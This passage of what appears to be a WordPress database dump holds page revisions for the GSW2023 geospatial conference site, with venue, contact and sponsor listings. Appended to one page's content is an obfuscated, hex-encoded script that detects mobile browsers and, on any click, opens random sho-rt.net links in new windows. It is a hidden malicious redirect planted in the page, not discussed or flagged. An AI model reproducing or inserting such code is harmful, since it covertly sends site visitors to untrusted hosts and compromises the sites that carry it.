soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:22:37','2023-08-15 23:22:37','',3066,'https://gsw2023.com/?p=5217',0,'revision','',0),
(5218,1,'2023-08-15 23:23:19','2023-08-15 23:23:19','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More 